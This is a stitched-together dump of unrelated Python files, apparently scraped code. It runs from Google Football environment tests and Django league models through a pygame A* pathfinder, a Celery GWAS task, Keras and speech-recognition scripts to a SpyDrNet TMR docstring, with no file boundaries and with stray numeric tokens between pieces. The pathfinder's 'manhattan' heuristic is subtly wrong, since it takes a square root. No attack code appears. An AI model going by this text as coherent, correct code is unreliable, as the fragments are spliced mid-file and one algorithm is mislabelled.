store_userid(self, '') credentials_entity = Credentials.get_by_key_name(self.userid) if credentials_entity: credentials_entity.delete() self.redirect('/auth') return check_auth tests/env_api/test_google_football.py import numpy as np import pytest from malib.envs.gr_football import BaseGFootBall from malib.envs.gr_football.env import ParameterSharing from malib.envs.gr_football.wrappers import GroupedGFBall from malib.utils.episode import EpisodeKey @pytest.mark.parametrize( "env_name,n_player_left,n_player_right,use_built_in_GK, action_set", [ ("5_vs_5", 4, 0, True, "default"), ("5_vs_5", 5, 5, True, "v2"), # 5v5 failed ("5_vs_5", 5, 0, True, "v2"), ("5_vs_5", 4, 0, False, "default"), ("5_vs_5", 5, 5, False, "v2"), # 5v5 failed ("5_vs_5", 5, 0, False, "v2"), ], scope="class", ) class TestGoogleFootballEnv: @pytest.fixture(autouse=True) def _init( self, env_name: str, n_player_left: int, n_player_right: int, action_set: str, use_built_in_GK: bool, ): scenario_configs = { "env_name": env_name, "number_of_left_players_agent_controls": n_player_left, "number_of_right_players_agent_controls": n_player_right, "representation": "raw", "logdir": "", "write_goal_dumps": False, "write_full_episode_dumps": False, "render": False, "stacked": False, "other_config_options": {"action_set": action_set}, } self.env = BaseGFootBall( env_id="Gfootball", use_built_in_GK=use_built_in_GK, scenario_configs=scenario_configs, ) self.env.seed() self.env_id = "Gfootball" self.use_built_in_GK = use_built_in_GK self.scenario_configs = scenario_configs def test_env_api(self): rets = self.env.reset(max_step=20) act_spaces = self.env.action_spaces assert EpisodeKey.CUR_OBS in rets for _ in range(20): action = {aid: space.sample() for aid, space in act_spaces.items()} rets = self.env.step(action) assert self.env.cnt <= 20 assert rets[EpisodeKey.DONE]["__all__"], (self.env.cnt, rets[EpisodeKey.DONE]) print(self.env.collect_info()) def test_parameter_sharing_wrapper(self): mapping_func = lambda x: x[:6] env = ParameterSharing(self.env, mapping_func) state_spaces = env.state_spaces observation_spaces = env.observation_spaces act_spaces = env.action_spaces rets = env.reset(max_step=20) assert EpisodeKey.CUR_STATE in rets for aid, obs in rets[EpisodeKey.CUR_OBS].items(): assert obs.shape[1] == observation_spaces[aid].shape[0] for aid, state in rets[EpisodeKey.CUR_STATE].items(): assert len(state.shape) == 2 assert state_spaces[aid].shape[0] == state.shape[1], ( aid, state_spaces, state, ) for _ in range(20): actions = { aid: np.asarray( [space.sample()] * rets[EpisodeKey.CUR_OBS][aid].shape[0], dtype=int ) for aid, space in act_spaces.items() } rets = env.step(actions) # update next to cur rets[EpisodeKey.CUR_OBS] = rets[EpisodeKey.NEXT_OBS] rets[EpisodeKey.CUR_STATE] = rets[EpisodeKey.NEXT_STATE] assert self.env.cnt <= 20 assert rets[EpisodeKey.DONE]["__all__"], (self.env.cnt, rets[EpisodeKey.DONE]) env.close() @pytest.mark.parametrize( "group_func", [ lambda agent_id: agent_id, ], ) def test_group_wrapper(self, group_func): env = GroupedGFBall(self.env, group_func) state_spaces = env.state_spaces observation_spaces = env.observation_spaces action_spaces = env.action_spaces # check whether the group rule matches the group_func possible_agents = self.env.possible_agents for aid in possible_agents: group_pred = env.group_rule(aid) group_target = group_func(aid) assert group_pred == group_target, (group_pred, group_target) assert aid in state_spaces assert aid in observation_spaces assert aid in action_spaces rets = 
env.reset(max_step=20) assert EpisodeKey.CUR_STATE in rets for aid, obs in rets[EpisodeKey.CUR_OBS].items(): assert observation_spaces[aid].contains(obs) for aid, state in rets[EpisodeKey.CUR_STATE].items(): assert state_spaces[aid].contains(state) for _ in range(20): actions = {aid: space.sample() for aid, space in action_spaces.items()} rets = env.step(actions) # update next to cur rets[EpisodeKey.CUR_OBS] = rets[EpisodeKey.NEXT_OBS] rets[EpisodeKey.CUR_STATE] = rets[EpisodeKey.NEXT_STATE] assert self.env.cnt <= 20 assert rets[EpisodeKey.DONE]["__all__"], (self.env.cnt, rets[EpisodeKey.DONE]) env.close() from django.conf import settings from django.core import validators from django.db import models from django.urls import reverse from districts.models import District class Season(models.Model): start_year = models.PositiveIntegerField(unique=True, validators=[ validators.MinValueValidator(1990), validators.MaxValueValidator(2050)]) def __str__(self): return '{}/{}'.format(self.start_year, self.start_year + 1) class League(models.Model): name = models.TextField() abbreviation = models.TextField() district = models.ForeignKey(District, on_delete=models.CASCADE) season = models.ForeignKey(Season, on_delete=models.CASCADE) bhv_id = models.IntegerField(unique=True) class Meta: unique_together = (('name', 'district', 'season'), ('abbreviation', 'district', 'season')) def __str__(self): return '{} {} {}'.format(self.bhv_id, self.name, self.season) def get_absolute_url(self): return reverse('leagues:detail', kwargs={'bhv_id': self.bhv_id}) @staticmethod def build_source_url(bhv_id): return settings.ROOT_SOURCE_URL + 'Spielbetrieb/index.php?orgGrpID=1&all=1&score={}'.format(bhv_id) def source_url(self): return self.build_source_url(self.bhv_id) @property def youth(self) -> bool: return self.is_youth(self.abbreviation, self.name) @staticmethod def is_youth(abbreviation: str, name: str) -> bool: if name in ['Kreisliga A', 'K', 'K', 'Spielrunde Special Olympics']: return False if 'Mini' in name: return True youth_match = abbreviation[:1] in ['m', 'w', 'g', 'u', 'U'] \ or any(n in name for n in ['Jugend', 'Jgd', 'Mini', 'Jungen', 'Mädchen', 'Jongen', 'Meedercher', 'weiblich', 'männlich']) adult_match = abbreviation[:1] in ['M', 'F'] \ or any(n in name for n in ['Männer', 'Frauen', 'Herren', 'Damen', 'Hären', 'Dammen', 'Senioren', 'Seniorinnen']) if youth_match == adult_match: raise ValueError(f'Youth undecidable: {abbreviation} {name}') return youth_match # - last edit: 4/23/2020 @3PM import pygame, sys, random, math, time import constants from buttons import draw_rect from buttons import button_hover from buttons import button_press from buttons import text # Randomly generates obstacles - draws them red and returns the coordinates of them def random_fill(x, y, w, p): obstacle = (x, y) rand = random.randint(0, 50) if rand < p: pygame.draw.rect(surface, constants.RED, (x, y, w, w)) return obstacle # draws in the correctly sized grid and calls random_fill() for obstacles def draw(w, p, grid): obst_list = [] x, y = 0, 0 for row in grid: for col in row: pygame.draw.rect(surface, constants.BLUE, (x, y, w, w), 1) if x == 0 and y == 0: pygame.draw.rect(surface, constants.GREEN, (x, y, w, w)) pass elif x == 792 and y == 792 or x == 796 and y == 796 or x == constants.END_3X and y == constants.END_3Y: continue else: val = random_fill(x, y, w, p) if val is not None: obst_list.append(val) pygame.display.update() x = x + w y = y + w x = 0 return obst_list # straight line distance used for g def distance(nx, ny, 
gx, gy): g = math.sqrt((abs(gx - nx) ** 2) + (abs(gy - ny) ** 2)) return g # + h # manhattan distance used for h def manhattan(nx, ny, gx, gy): h = math.sqrt(abs(nx - gx) + abs(ny - gy)) return h # Generates all neighbors of the current node and removes based on if it is an obstacle, or if that node has been # traveled to before. Applies heuristic to neighbors and travels based on minimum f score. Recursively calls itself # and stores the path that it took for the repairing method. def astar(x, y, blocked, end, w): current = (x, y) all_neighbors = [(x + w, y), (x, y + w), (x + w, y + w), (x - w, y - w), (x - w, y), (x - w, y + w), (x, y - w), (x + w, y - w)] for i in blocked: if i in all_neighbors: all_neighbors.remove(i) for i in constants.PATH: if i in all_neighbors: all_neighbors.remove(i) neighbor_list1 = heuristic(all_neighbors, end) try: shortest = min(neighbor_list1, key=neighbor_list1.get) constants.SUM += neighbor_list1.get(shortest) for val, key in neighbor_list1.items(): if 0 <= val[0] < 800 and 0 <= val[1] < 800: if val == shortest: current = val pygame.draw.rect(surface, constants.GREEN, (*current, w, w)) pygame.time.wait(1) pygame.display.update() constants.PATH_DIST.append(key) try: current_index = constants.PATH_DIST.index(key) if constants.PATH_DIST[current_index] > constants.PATH_DIST[current_index - 3]: if (constants.PATH_DIST[current_index] - constants.PATH_DIST[current_index - 3]) < 100: blocked.append(current) except IndexError: continue except ValueError: pass constants.PATH.append(current) try: if current != end: astar(*current, blocked, end, w) except RecursionError: current_id = constants.PATH.index(current) if current != constants.START and constants.PATH[current_id - 1] != constants.START: blocked.append(current) blocked.append(constants.PATH[current_id - 1]) # print("(R)") return constants.SUM, constants.PATH # Takes in neighbor list and using a dictionary, stores the coordinates and calculated f score. Returns dictionary. def heuristic(neighbors, end): neighbor_list = {} counter = 0 if counter != len(neighbors): for i in neighbors: dist = distance(*i, *end) + (constants.INFLATION * manhattan(*i, *end)) # CONSTANT ENDING neighbor_list[i] = dist counter += 1 return neighbor_list # Method to visually clear the path that was taken - clears up for next iteration. 
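# --- Illustrative note (added) on the two heuristics defined above ---
# distance() is the Euclidean (straight-line) metric sqrt(dx**2 + dy**2). The
# manhattan() helper actually returns sqrt(|dx| + |dy|); the textbook Manhattan
# distance is simply |dx| + |dy|, with no square root. Standard forms, for
# comparison only (the original functions are left untouched):
import math

def euclidean_distance(nx, ny, gx, gy):
    return math.hypot(gx - nx, gy - ny)       # sqrt((gx-nx)**2 + (gy-ny)**2)

def manhattan_distance(nx, ny, gx, gy):
    return abs(gx - nx) + abs(gy - ny)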
def clear(path, w): for i in path: pygame.draw.rect(surface, constants.SEA_GREEN, (*i, w, w)) # iterates based on a decrementing W0, decremented inflation e is applied to the heuristic def repairing(path_sum, blocked, path, end, w): start_time = time.time() while constants.W0 > 0: clear(path, w) pygame.draw.rect(surface, constants.GREEN, (*end, w, w)) pygame.display.update() constants.PATH.clear() sum_next = astar(*constants.START, blocked, end, w) half_val = math.floor(sum_next[0] / 2) if sum_next[0] < path_sum: clear(path, w) pygame.display.update() elif half_val == math.floor(path_sum): break if constants.INFLATION >= 1: constants.INFLATION -= 1 constants.W0 -= constants.W1 print("RUN TIME: %s seconds" % (time.time() - start_time)) # called based on button press def choice(w, end, p, grid): start_time = time.time() constants.OBSTACLES = draw(w, p, grid) print("GRID GENERATION: %s seconds" % (time.time() - start_time)) traveled = astar(*constants.START, constants.OBSTACLES, end, w) repairing(traveled[0], constants.OBSTACLES, traveled[1], end, w) pygame.display.update() # main function def main(): surface.fill(constants.BLACK) text() while constants.END is False: for event in pygame.event.get(): if event.type == pygame.MOUSEBUTTONDOWN: button_press(event, surface) if event.type == pygame.QUIT: sys.exit() draw_rect(surface) button_hover(surface) pygame.init() surface = pygame.display.set_mode((constants.WIDTH + 200, constants.HEIGHT)) main() 0 from __future__ import absolute_import from celery.utils.log import get_task_logger from celery.signals import after_setup_task_logger from gwaportalpipeline.celery import celery from gwaportalpipeline.common import * from gwaportalpipeline import utils from gwaportalpipeline import permute from pygwas.core import genotype import bisect import numpy import h5py import os import operator import logging logger = get_task_logger(__name__) @after_setup_task_logger.connect def setup_task_logger(**kwargs): ph = CeleryProgressLogHandler(candidate_gene_list_enrichment) logger.addHandler(ph) @celery.task(serialiazer='json') def candidate_gene_list_enrichment(candidate_gene_list_id,study_id,genotypeid,windowSize,numberOfPermutations,top_snp_count): pval_file = None pval = None try: logger.info('Retrieving candidate gene list',extra={'progress':2}) candidate_genes = restclient.get_candidate_genes(candidate_gene_list_id) if len(candidate_genes) == 0: raise Exception('No genes found in candidate gene list') logger.info('Retrieve HDF5 File') pval_file = restclient.download_study_file(study_id,LOCAL_DATA_FOLDER) logger.info('Retrieve genotype') genotypeData = _load_genotype_(GENOTYPE_FOLDER,genotypeid) chr_regions = genotypeData.chr_regions chr_pos_list= zip(genotypeData.chromosomes,genotypeData.positions) pval = _candidate_gene_list_enrichment(candidate_genes,pval_file,chr_pos_list,chr_regions,windowSize,numberOfPermutations,top_snp_count) except Exception,err: logger.exception(err) raise err finally: if pval_file is not None: os.unlink(pval_file) return {'pvalue':pval} def _candidate_gene_list_enrichment(candidate_genes,pval_file,pos_chr_list,chr_regions,windowSize,numberOfPermutations,TOP_SNP_LIMIT): pos_chr_list = numpy.asarray(pos_chr_list) logger.info('Retrieve %s TOP GWAS SNPs' % TOP_SNP_LIMIT) top_snps = utils.get_top_snps(pval_file,TOP_SNP_LIMIT) logger.info('Retrieve TOP SNP Matrix') top_snps_matrix = _get_snps_snps_matrix(pos_chr_list,top_snps,chr_regions) logger.info('Retrieve Gene Matrix (windowsize:%s)' % windowSize) candidate_gene_matrix = 
_get_gene_snps_matrix(pos_chr_list,candidate_genes,chr_regions,windowSize) per = permute.permute() per.load_vectors(candidate_gene_matrix,top_snps_matrix) logger.info('Starting permutation test (#: %s)' % numberOfPermutations,extra={'progress':5}) pval = per.permute_p_val(numberOfPermutations) logger.info('Finished permutation test',extra={'progress':95}) return pval def _get_snps_snps_matrix(snps,top_snps,chr_regions): # sort by chr and position #use lexsort top_snps.sort(order=['chr','position']) chr_start = 0 chr_start_ix = 0 indices = [] vector = numpy.zeros((len(snps),),dtype='int32') for snp in top_snps: chr = int(snp[0]) if chr != chr_start: chr_start = chr chr_start_ix = chr_regions[chr-1][0] chr_end_ix = chr_regions[chr-1][1] indices.append(chr_start_ix + snps[chr_start_ix:chr_end_ix][:,1].searchsorted(snp[1])) vector[indices] = 1 return vector def _get_gene_snps_matrix(snps,genes,chr_regions,windowsize): # sort by gene name and first position sorted_genes = sorted(genes, key=operator.itemgetter(3, 0)) chr_start = 0 chr_start_ix = 0 indices = [] vector = numpy.zeros((len(snps),),dtype='int32') for gene in sorted_genes: chr = int(gene[3][2]) if chr != chr_start: chr_start = chr chr_start_ix = chr_regions[chr-1][0] chr_end_ix = chr_regions[chr-1][1] ix_start = chr_start_ix+ snps[chr_start_ix:chr_end_ix][:,1].searchsorted(gene[0]-windowsize,side='left') ix_end = chr_start_ix + snps[chr_start_ix:chr_end_ix][:,1].searchsorted(gene[1]+windowsize,side='right') vector[ix_start:ix_end] = 1 return vector def _load_genotype_(folder,genotype_id): data_format = 'binary' file_prefix = os.path.join(folder,str(genotype_id)) hdf5_file = os.path.join(file_prefix,'all_chromosomes_%s.hdf5' % data_format) if os.path.isfile(hdf5_file): return genotype.load_hdf5_genotype_data(hdf5_file) raise Exception('No Genotype files in %s folder were found.' % file_prefix) def test_respx_mock_fixture(testdir): testdir.makepyfile( """ import httpx import pytest def test_plain_fixture(respx_mock): route = respx_mock.get("https://foo.bar/") % 204 response = httpx.get("https://foo.bar/") assert response.status_code == 204 @pytest.mark.respx(base_url="https://foo.bar", assert_all_mocked=False) def test_marked_fixture(respx_mock): route = respx_mock.get("/") % 204 response = httpx.get("https://foo.bar/") assert response.status_code == 204 response = httpx.get("https://example.org/") assert response.status_code == 200 """ ) result = testdir.runpytest("-p", "respx") result.assert_outcomes(passed=2) afishas/progs/proc6c.py #! 
/usr/bin/env python3 # , 2020 # proc6b.py 2020-11-19 2020-11-19 0.1 # АСАП, КААП # обработка бард-афиши, дамп DBMS sqlite3 в tab- файл, архивист: М.Колодин import sqlite3 db = 'apx.db' txt = 'apx.tab' conn = sqlite3.connect(db) cur = conn.cursor() rep = 0 with open(txt, 'w') as tf: tf.write("id wd year date datesql time city place what desc source status shown uuid\n") for row in cur.execute('select * from data order by datesql asc, time asc'): rep += 1 print(rep % 10, end="", flush=True) # ~ if rep > 9: break a = list(row) a[7] = a[7].strip() a[8] = a[8].strip() a[9] = a[9].strip() a[10] = a[10].strip() a[11] = a[11].strip() a[12] = a[12].strip() #0 1 2 3 4 5 6 7 8 9 10 11 12 13 #N wd year date datesql time city place what desc source status shown uuid\n') tf.write(f"{a[0]}\t{a[1]}\t{a[2]}\t{a[3]}\t{a[4]}\t{a[5]}\t{a[6]}\t{a[7]}\t{a[8]}\t{a[9]}\t{a[10]}\t{a[11]}\t{a[12]}\t{a[13]}\n") conn.close() print(f"обработано событий: {rep}") # coding:utf-8 import gc import os import numpy as np import pandas as pd from nltk import word_tokenize from nltk.corpus import stopwords from nltk.stem.wordnet import WordNetLemmatizer from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from sklearn.model_selection import KFold from keras.models import Sequential from keras.layers import Embedding, SimpleRNN, Dense from keras.losses import msle from keras.optimizers import Adam from keras.callbacks import EarlyStopping np.random.seed(7) def rmsle(y_true, y_pred): import keras.backend as K return K.sqrt(msle(y_true, y_pred)) class PrepareOverviewRnn(object): def __init__(self, *, input_path, output_path): self.__input_path, self.__output_path = input_path, output_path self.__train, self.__test = [None for _ in range(2)] self.__train_feature, self.__test_feature = [None for _ in range(2)] self.__train_label, self.__test_label = [None for _ in range(2)] self.__tok = None self.__mle = None self.__folds = None self.__oof_preds = None self.__sub_preds = None def read_data(self): self.__train = pd.read_csv(os.path.join(self.__input_path, "train.csv")) self.__test = pd.read_csv(os.path.join(self.__input_path, "test.csv")) def prepare_data(self): self.__train_feature = self.__train[["overview"]].copy() self.__test_feature = self.__test[["overview"]].copy() self.__train_label = self.__train["revenue"].copy() del self.__train, self.__test gc.collect() # train clean # 去除非字母符号 self.__train_feature["overview"] = \ self.__train_feature["overview"].str.lower().str.replace(r"[^a-zA-Z]", " ") # 分词 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda text: word_tokenize(text)) # 去除非单词 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: [word for word in words if word.isalpha()]) # 去除停用词 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: [word for word in words if word not in stopwords.words("english")]) # 词形还原 词干提取 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="n") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="v") for 
word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="a") for word in words]) # 拼接 list 成 string 以便 vectorizer 使用 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: " ".join(words)) # 填充缺失值 self.__train_feature["overview"] = self.__train_feature["overview"].fillna(" ") # test clean self.__test_feature["overview"] = \ self.__test_feature["overview"].str.lower().str.replace(r"[^a-zA-Z]", " ") self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda text: word_tokenize(text)) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: [word for word in words if word.isalpha()]) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: [word for word in words if word not in stopwords.words("english")]) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="n") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="v") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="a") for word in words]) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: " ".join(words)) self.__test_feature["overview"] = self.__test_feature["overview"].fillna(" ") self.__tok = Tokenizer(split=" ") self.__tok.fit_on_texts(self.__train_feature["overview"]) self.__train_feature = self.__tok.texts_to_sequences(self.__train_feature["overview"]) self.__test_feature = self.__tok.texts_to_sequences(self.__test_feature["overview"]) self.__mle = int(np.percentile([len(element) for element in self.__train_feature], [95])) self.__train_feature = pad_sequences(self.__train_feature, maxlen=self.__mle) self.__test_feature = pad_sequences(self.__test_feature, maxlen=self.__mle) self.__train_label = self.__train_label.values def fit_predict_model(self): embeddings_index = dict() with open("E:\\Kaggle\\TMDB_Box_Office_Prediction\\glove\\glove.6B.50d.txt", mode="r", encoding="utf-8") as f: line = f.readline() while line: values = line.split() word = values[0] embeddings_index[word] = np.array(values[1:], dtype="float32") line = f.readline() embedding_matrix = np.zeros((len(self.__tok.word_index) + 1, 50)) for word, i in self.__tok.word_index.items(): embedding_vector = embeddings_index.get(word) if embedding_vector is not None: embedding_matrix[i] = embedding_vector self.__folds = KFold(n_splits=5, shuffle=True, random_state=7) self.__oof_preds = np.zeros(shape=self.__train_feature.shape[0]) self.__sub_preds = np.zeros(shape=self.__test_feature.shape[0]) for n_fold, (trn_idx, val_idx) in enumerate(self.__folds.split(self.__train_feature, self.__train_label)): trn_x, trn_y = self.__train_feature[trn_idx], self.__train_label[trn_idx] val_x, val_y = self.__train_feature[val_idx], self.__train_label[val_idx] net = Sequential() net.add(Embedding( input_dim=len(self.__tok.word_index) + 1, output_dim=50, weights=[embedding_matrix], 
input_length=self.__mle, trainable=False )) net.add(SimpleRNN(units=2)) # overfitting net.add(Dense(1, activation="linear")) net.compile(loss=rmsle, optimizer=Adam()) net.fit( x=trn_x, y=np.log1p(trn_y), batch_size=32, epochs=10, verbose=2, callbacks=[EarlyStopping(monitor="val_loss", mode="min", patience=2)], validation_data=(val_x, val_y) ) pred_val = np.expm1(net.predict(val_x)).reshape(-1, ) # predict shape (, 1) pred_test = np.expm1(net.predict(self.__test_feature)).reshape(-1, ) self.__oof_preds[val_idx] = pred_val self.__sub_preds += pred_test / self.__folds.n_splits del trn_x, trn_y, val_x, val_y gc.collect() def write_data(self): pd.Series(self.__oof_preds) \ .to_frame("train_rnn_overview") \ .to_csv(os.path.join(self.__output_path, "train_rnn_overview.csv"), index=False) pd.Series(self.__sub_preds) \ .to_frame("test_rnn_overview") \ .to_csv(os.path.join(self.__output_path, "test_rnn_overview.csv"), index=False) if __name__ == "__main__": por = PrepareOverviewRnn( input_path="E:\\Kaggle\\TMDB_Box_Office_Prediction\\raw", output_path="E:\\Kaggle\\TMDB_Box_Office_Prediction\\output" ) por.read_data() por.prepare_data() por.fit_predict_model() por.write_data()import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' # This is a little hack. if we don't throw erro into /dev/null, # python-shell catch the error. import sys stderr = sys.stderr sys.stderr = open('/dev/null', 'w') import numpy as np from data_generator import AudioGenerator from keras import backend as K from utils import int_sequence_to_text from keras.backend.tensorflow_backend import set_session import tensorflow as tf # import NN architectures for speech recognition from sample_models import * # This is a little hack. if we don't throw erro into /dev/null, # finally back to stderr normal sys.stderr = stderr def get_predictions(audio_path, input_to_softmax, model_path): """ Print a model's decoded predictions Params: index (int): The example you would like to visualize partition (str): One of 'train' or 'validation' input_to_softmax (Model): The acoustic model model_path (str): Path to saved acoustic model's weights """ # print("OK"); # return; # load the train and test data data_gen = AudioGenerator(spectrogram=False, mfcc_dim=13) # read and get features # audio_path = "./samples/16/19/16-19-0159.wav" # print("audio_path:{}".format(audio_path)) # data not normalized yet data_point = data_gen.featurize(audio_path) # print("shape:{}".format(data_gen.featurize(audio_path).shape)) # print("feats_mean: {}".format(data_gen.feats_mean)) # print("feats_std: {}".format(data_gen.feats_std)) # print("feats_mean: {}".format(data_gen.feats_mean.shape)) # print("feats_std: {}".format(data_gen.feats_std.shape)) feats_mean = np.array([14.81652005, -0.1802923, -1.22285122, 0.87062853, -16.05643781, -14.03943633, -5.7298706, -15.52425927, -3.39637537, -3.85226744, -5.17435844, -2.13766871, -11.39111645]) feats_std = np.array([7.16816358, 14.58747728, 11.99928947, 15.69431836, 14.45918537, 16.79930368, 13.98395715, 12.60133111, 11.61310503, 11.34526655, 12.01205471, 13.41467652, 10.89021869]) # print("feats_mean: {}".format(feats_mean)) # print("feats_std: {}".format(feats_std)) # print("feats_mean: {}".format(feats_mean.shape)) # print("feats_std: {}".format(feats_std.shape)) # print(data_gen.featurize(audio_path).shape) # normalize data eps = 1e-14 data_point = (data_point - feats_mean) / (feats_std + eps) # data_point = data_gen.normalize(data_gen.featurize(audio_path)) # print("data_point,shape:{}".format(data_point.shape)) # obtain and 
decode the acoustic model's predictions input_to_softmax.load_weights(model_path) prediction = input_to_softmax.predict(np.expand_dims(data_point, axis=0)) output_length = [input_to_softmax.output_length(data_point.shape[0])] pred_ints = (K.eval(K.ctc_decode( prediction, output_length)[0][0])+1).flatten().tolist() recognized_text = "".join(int_sequence_to_text(pred_ints)) print(recognized_text) # # play the audio file, and display the true and predicted transcriptions # print('-'*80) # # Audio(audio_path) # # print('True transcription:\n' + '\n' + transcr) # print('-'*80) # print('Predicted transcription:\n' + '\n' + ''.join(int_sequence_to_text(pred_ints))) # print('-'*80) def main(argv): # if (argv) # argv_1 = argv[1] # print("argv_1: {}".format(argv_1)) print("argv_1: {}".format( len(argv) )) # print("argv, len:{}".format(len(argv))) print("argv:{}".format(argv)) if len(argv) < 2: print("error") return # /home/kouohhashi/AIND-VUI-Capstone/samples/16/13/16-13-0000.wav audio_path = argv[1] print(audio_path) # return; # print(get_predictions) # get_predictions(audio_path=audio_path, input_to_softmax=final_model(input_dim=13, # change to 13 if you would like to use MFCC features filters=200, kernel_size=11, conv_stride=2, conv_border_mode='valid', units=200, output_dim=85), model_path='/home/kouohhashi/AIND-VUI-Capstone/results/model_end.h5') if __name__ == '__main__': main(sys.argv) # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. import torch import numpy as np def evaluate_nll(model, test_set, batch_size=32, return_nll_list=False): was_training = model.training model.eval() cum_nll = 0. cum_ppl = 0. cum_examples = 0. nll_dict = dict() with torch.no_grad(): for batch_examples in test_set.batch_iter(batch_size): log_probs = -model(batch_examples)['log_probs'] batch_code_tokens_num = torch.tensor([len(e.updated_data) for e in batch_examples], dtype=torch.float, device=log_probs.device) batch_nlls = log_probs.cpu().numpy() batch_ppls = (log_probs / batch_code_tokens_num).cpu().numpy() for batch_id in range(len(batch_examples)): nll_dict[batch_examples[batch_id].id] = batch_nlls[batch_id] cum_ppl += batch_ppls.sum() cum_nll += batch_nlls.sum() cum_examples += len(batch_examples) del log_probs avg_ppl = np.exp(cum_ppl / cum_examples) avg_nll = cum_nll / cum_examples if was_training: model.train(was_training) if return_nll_list: return avg_nll, avg_ppl, nll_dict else: return avg_nll, avg_ppl 0 # Generated by Django 3.1 on 2020-10-02 21:03 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('subscription', '0002_auto_20200930_0017'), ] operations = [ migrations.AlterField( model_name='subscription', name='sub_type', field=models.CharField(choices=[('W', 'week'), ('M', 'month'), ('Y', 'year'), ('L', 'life_time')], default='M', max_length=2), ), ] 1-10 from typing import Dict from flask_babel import _ from anyway.backend_constants import BE_CONST as BE from anyway.request_params import RequestParams from anyway.widgets.suburban_widgets.killed_and_injured_count_per_age_group_widget_utils import ( KilledAndInjuredCountPerAgeGroupWidgetUtils, ) from anyway.widgets.suburban_widgets.sub_urban_widget import SubUrbanWidget from anyway.widgets.widget import register @register class KilledInjuredCountPerAgeGroupWidget(SubUrbanWidget): name: str = "killed_and_injured_count_per_age_group" def __init__(self, request_params: RequestParams): super().__init__(request_params, type(self).name) self.rank = 14 def generate_items(self) -> None: 
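# Sum the per-severity injured counts for each age group returned by the
# widget utils and expose them as {BE.LKEY: age_group, BE.VAL: total} items.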
raw_data = KilledAndInjuredCountPerAgeGroupWidgetUtils.filter_and_group_injured_count_per_age_group( self.request_params ) structured_data_list = [] for age_group, severity_dict in raw_data.items(): count_total = 0 for count in severity_dict.values(): count_total += count structured_data_list.append({BE.LKEY: age_group, BE.VAL: count_total}) self.items = structured_data_list @staticmethod def localize_items(request_params: RequestParams, items: Dict) -> Dict: items["data"]["text"] = { "title": _("Injury per age group"), "subtitle": _("In") + " " + request_params.location_info["road_segment_name"], } return items import time from grove.grove_light_sensor_v1_2 import GroveLightSensor from grove.grove_led import GroveLed light_sensor = GroveLightSensor(0) led = GroveLed(5) while True: light = light_sensor.light print('Light level:', light) if light < 200: led.on() else: led.off() time.sleep(1)import pandas as pd # Read in the data from the text file using the full pathway # Use the pokemon name as the index ____ = ____(____, ____, ____) # Display the first 10 rows ____examples/basic/toggle_tmr.py """ Toggle TMR Example ------------------- This is an example of doing TMR on a basic design using SpyDrNet TMR. First, we start with a simple design that includes a LUT and a flip flop. The following block is SystemVerilog code: .. code-block:: sv module toggle( input wire logic clk, reset, output logic out ); always_ff @(posedge clk) if (reset) out <= 0; else out <= ~out; endmodule .. figure:: ../../figures/toggle_original.png :width: 600px :align: center Original Design Then we find the instances and ports to replicate. Note that in the following code that the only ports specified to be triplicated are the input ports that are not the clock (so just the reset port). We also find the voter insertion points. .. code-block:: hinstances_to_replicate = list(netlist.get_hinstances(recursive=True, filter=lambda x: x.item.reference.is_leaf() is True)) instances_to_replicate = list(x.item for x in hinstances_to_replicate) hports_to_replicate = list(netlist.get_hports(filter = lambda x: x.item.direction is sdn.IN)) for x in hports_to_replicate: if "clk" in x.name: hports_to_replicate.remove(x) ports_to_replicate = list(x.item for x in hports_to_replicate) insertion_points = find_after_ff_voter_points([*hinstances_to_replicate, *hports_to_replicate], {'FDRE', 'FDSE', 'FDPE', 'FDCE'}) Next, we triplicate the design using apply_nmr(). The instances and ports we specified are passed as two of the parameters. We also pass '3' and 'TMR' as number of replications and the applicable suffix, respectively. .. code-block:: replicas = apply_nmr([*instances_to_replicate, *ports_to_replicate], 3, name_suffix='TMR', rename_original=True) .. figure:: ../../figures/toggle_just_tmr.png :width: 600px :align: center Design After Triplication Then we insert voters using insert_organs(). .. code-block:: voters = insert_organs(replicas, insertion_points, XilinxTMRVoter(), 'VOTER') While viewing the schematic, note that the voters' outputs feed back into the flip flops. This will get the flip flop onto the correct state if its previous output was outvoted. Also note that one of the voters outputs to the 'out' port. .. 
